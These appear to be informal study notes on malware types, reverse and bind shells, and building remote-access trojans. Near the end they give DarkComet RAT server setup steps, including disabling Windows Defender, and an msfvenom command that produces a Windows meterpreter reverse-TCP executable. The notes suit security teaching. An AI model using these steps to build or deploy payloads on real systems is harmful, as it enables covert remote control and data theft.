u0Q2wVbd

1Malware 
2what is ?
3mal + ware = malicious software
4
5designed to infiltirate and damage computers without the user consent. 
6the term malware encompasses all the diff. types of threats to your computer such as :
7viruses, spywares , worms ,trojans etc.
8
9Purpose of Malware !!
10why do we need malware ? why were they created at first place ?
11> to do things without user's permission 
12> to Steal files 
13> to steal stored passwords 
14> to hijack into computer
15> to hijack core computing functions
16> to monitor the activity of the user
17> to delete sensitive personal data
18> to encrypt sensitive data 
19> to extort money
20 
21Types of Malwares :
22
231. Virus: vital info resource under sieze 
24	disrupts the normal functionality of computer 
25
26	they are genearlly masked with executable files (i.e attached to exe files)
27	the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
28	Normally, the host program keeps functioning after it is infected by the virus.
29	although they can not replicate themselves outside the network . but has the ability to replicate and attach itself to other files locally 
30 	Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
31	 a disk, file sharing, or infected email attachments.
32	
332. Worm: 
34similar to viruses , replicate itself outside the n/w as well	
35self replicating without host program and spreads without any human interaction or directives from the malware authors.
36worms are standalone software and do not require a host program or human help to propagate
37A worm enters a computer through a vulnerability in the system and takes advantage of 
38file-transport or information-transport features on the system, allowing it to travel unaided
39
40stuxnet :::::::::::::    	https://www.youtube.com/watch?v=TGGxqjpka-U
41
423. Trojan 
43malicious s/w represents as valid 
44> A Trojan is another type of malware named after the wooden horse that the Greeks used to infiltrate Troy. 
45> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems. 
46> After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
47 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses). 
48> Trojans are also known to create backdoors to give malicious users access to the system. 
49> Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. 
50> Trojans must spread through user interaction such as opening an email attachment or downloading and running a file from the Internet.
51
52https://www.youtube.com/watch?v=Td1uPq9K--E 
53
54
554. Spyware
56Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
57 or that asserts control over a device without the consumer's knowledge.
58
595. Ransomware
60kind of malware that is used to extort money by infecting the user.
61it encrypt all the files on a user's system using a strong encryption algoritham. Then demands for ranson to issue a decrypting key to retrieve / decrypt the user data .
62
636. Rootkit
64Programs that hide the existence of malware by intercepting (i.e., "Hooking") and modifying operating system API calls that supply system information. 
65Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower to include a hypervisor, master boot record, or the system firmware.
66 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
67 Rootkits have been seen for Windows, Linux, and Mac OS X systems.
68
697. keyloggers 
70special kind of Spyware 
71The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. 
72Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware
73-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
74
75What are shells?
76Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like servers, mobile phones, etc.).
77
78Types of shells
791.	Reverse shell
802.	Bind shell
81
82Reverse shell
83A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
84 
85Figure 1: Reverse TCP shell
86
87
88Bind shell
89Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. 
90The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.
91 
92Figure 2: Bind TCP shell
93There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
94 One thing which is common between all these shells is that they all communicate over a TCP protocol.
95-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
96
97Creating Malware 
98RAT: Remote Administration tool 
99Dark Comet Example 
100
101
102
103
104
105---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
106disable windows defender 
107open dark comet 
108server module (create server) --> full editor 
109process mutex --> threads 
110n/w setting --> enter lhost lport here --> press add
111this will open a socket in attacker machine to listen for incoming connection  
112listen for connection
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
129Msfvenom
130
131Creating Metasploit Payloads
132
133Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that
134 can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
135 Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.).
136 Execute and wait for the payload to be run. For the examples below it’s pretty self-explanatory but LHOST should be filled in with your IP address
137 (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
138
139
140>how to create a malicous file ..will not be obfuscating the file/ hiding the file
141> will be using reverse tcp 
142>reverse tcp connection is noisy and hence will be detected by windows defender 
143>staging and encoding techn not covered 
144
145List payloads
146msfvenom -l payload
147
148
149msfpayload + msfencode = msfvenom
150msf - metasploit f/w
151kali needed + winodows 10 (defender disabled )
152
153--browser may detect it downloading --anitvirus may detect it ---
154msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=124412 LPORT=53 -f exe -o filename